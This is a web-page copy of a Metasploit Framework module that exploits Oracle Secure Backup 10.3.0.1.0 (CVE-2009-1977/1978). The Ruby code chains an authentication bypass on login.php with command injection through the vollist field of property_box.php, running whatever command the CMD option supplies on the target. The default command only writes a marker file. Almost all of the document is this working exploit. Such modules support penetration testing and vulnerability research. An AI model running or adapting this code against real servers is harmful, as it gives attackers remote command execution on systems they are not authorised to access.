CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr2.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',

12
      'Description'    => %q{

13
          This module exploits an authentication bypass vulnerability

14
          in login.php in order to execute arbitrary code via a command injection

15
          vulnerability in property_box.php. This module was tested

16
          against Oracle Secure Backup version 10.3.0.1.0 (Win32).

17
      },

18
      'Author'         => [ 'MC' ],

19
      'License'        => MSF_LICENSE,

20
      'References'     =>

21
        [

22
          [ 'CVE', '2009-1977' ],

23
          [ 'OSVDB', '55903' ],

24
          [ 'CVE', '2009-1978' ],

25
          [ 'OSVDB', '55904' ],

26
          [ 'ZDI', '09-058' ],

27
          [ 'ZDI', '09-059' ],

28
        ],

29
      'DisclosureDate' => '2009-08-18'))

30


31
    register_options(

32
      [

33
        Opt::RPORT(443),

34
        OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),

35
        OptBool.new('SSL',   [true, 'Use SSL', true]),

36
      ])

37
  end

38


39
  def run

40
    cmd = datastore['CMD']

41


42
    res = send_request_cgi(

43
      {

44
        'uri'	=>  '/login.php',

45
        'data'	=>  'button=Login&attempt=1&mode=&tab=75&uname=-msf&passwd=msf',

46
        'method' => 'POST',

47
      }, 5)

48


49
      if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)

50


51
          print_status("Sending command: #{datastore['CMD']}...")

52


53
          send_request_cgi(

54
            {

55
              'uri'	=> '/property_box.php',

56
              'data'  => 'type=Sections&vollist=75' + Rex::Text.uri_encode("&" + cmd),

57
              'cookie' => res.get_cookies,

58
              'method' => 'POST',

59
            }, 5)

60


61
          print_status("Done.")

62
      else

63
        print_error("Invalid PHPSESSION token..")

64
        return

65
      end

66
  end

67
end

68


69